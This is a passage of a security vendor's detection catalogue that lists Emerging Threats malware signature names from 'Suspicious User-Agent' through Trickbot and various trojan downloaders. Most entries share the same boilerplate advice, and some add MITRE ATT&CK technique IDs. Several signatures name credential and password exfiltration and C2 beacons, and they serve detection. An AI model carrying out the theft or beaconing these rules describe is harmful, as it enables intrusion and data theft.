This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (Post)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious user agent (V32)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (WindowsNT) With No Separating Space

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Swizzor-based Downloader - Invalid User-Agent (Mozilla/4.0 (compatible MSIE 7.0 na .NET CLR 2.0.50727 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729))

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Swizzor Checkin (kgen_up)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Syrutrk/Gibon/Bredolab Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sysget/HelloBridge HTTP GET CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE sysrv.ELF Exploit Success Payload Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (AMD)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (AuthenticAMD)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (GenuineIntel)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE System Progressive Detection FakeAV (INTEL)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats External IP Lookup Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats Payload Downloaded

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats Pierogi Backdoor Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA402/Molerats Pierogi CnC Activity (Upload)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA421/YTTRIUM/APT29 TLS Certificate M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA421/YTTRIUM/APT29 TLS Certificate M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA421/YTTRIUM/APT29 TLS Certificate M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 GRAMDOOR Telegram CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 Nagual CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 Nagual/STARWHALE Beacon Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA450 Nagual/STARWHALE GoLang Beacon Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA453 ClumsyCover Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA453 ClumsyCover Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA453 Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA471 Malicious AutoIT File Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TA505 P2P CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TABMSGSQL/Sluegot.C Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taidoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taidoor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Targeted Activity - CnC Domain in SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tatanga/Win32.Kexject.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taurus Stealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Taurus Stealer CnC Host Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TDSServ or Tidserv variant Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TDSS/TDL/Alureon MBR rootkit Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TDTESS Backdoor User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeamBot CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeamTNT Gattling Gun AWS Creds Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeleBots BCS-server CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE TeleBots BCS-server User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TeleBots VBS Backdoor CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE TeleBots VBS Backdoor CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE TellYouThePass Ransomware Checkin Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Tendrit CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Tendrit CnC Beacon 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Terse Upload to Free Image Hosting Provider (uploads .im) - Likely Malware

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE [TGI] Cobalt Strike Malleable C2 Request (O365 Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE [TGI] Cobalt Strike Malleable C2 Request (YouTube Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE [TGI] Cobalt Strike Malleable C2 Response (O365 Profile) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE [TGI] Cobalt Strike Malleable C2 Response (YouTube Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE [TGI] Py.Machete HTTP CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tibs Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tibs/Harnig Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tibs Trojan Downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup ABK Backdoor CnC Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup BROLER.F CnC Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup Datper CnC Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup Datper CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TickGroup Datper CnC Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tick Group Payload - Reporting Error to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tick Group Payload - Submitting Encrypted Data to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tinba Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TinyTurla CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tonto_SPM Backdoor CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tordal/Hancitor/Chanitor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Torpig Reporting User Activity (wur8)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Torpig Reporting User Activity (x25)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tortoiseshell/HMH Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Tortoiseshell/SysKit CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Towerweb Ransomware Landing Page

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE TransparentTribe APT Maldoc CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TransparentTribe APT Related Activity (POST)

Description
Copy link

Recommendation
Copy link

ET MALWARE Trickbot Checkin Response

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Trickbot Payload Request

Description
Copy link

Trickbot is a modular Trojan That was initially developed as a banking Trojan in 2016. Trickbot has evolved into a complex, modular framework, which can also operate as a dropper for follow-up malware, such as Ryuk and/or various post-exploitation frameworks, such as Empire, Cobalt Strike, or Meterpreter. Trickbot is delivered to systems via malspam campaigns using various phishing themes and document lure types.

Trickbot uses various anti-analysis mechanisms and stores its configuration as an encrypted file on disk. Trickbot is rapidly updated with new modules that provide the malware with additional capabilities. These modules include capabilities, such as credential harvesting, network information gathering, system reconnaissance, banking information theft, network propagation, and persistence.

Recommendation
Copy link

Restore systems impacted by Trickbot to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE TripleNine RAT Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Agent.AIXD Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BackDoor-DRV.gen.c Reporting-1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Banker.Win32.Agent Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Bayrob Keepalive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Botnet Command Request CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Trojan.BlackRev Botnet Monitor Request CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Trojan.BlackRev Download Executable

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Get Command Rev3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Registering Client

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev Registration Rev3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.BlackRev V1.Botnet HTTP Login POST Flood Traffic Outbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan.Dirtjump Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader.Bancos Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader GetBooks UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader User-Agent BGroom

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader User-Agent (NOPE)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan Downloader User-Agent (Tiny)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Downloader.Win32.AutoIt.mj Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Trojan-Downloader Win32.Genome.AV

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE TrojanDownloader Win32/Harnig.gen-P Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

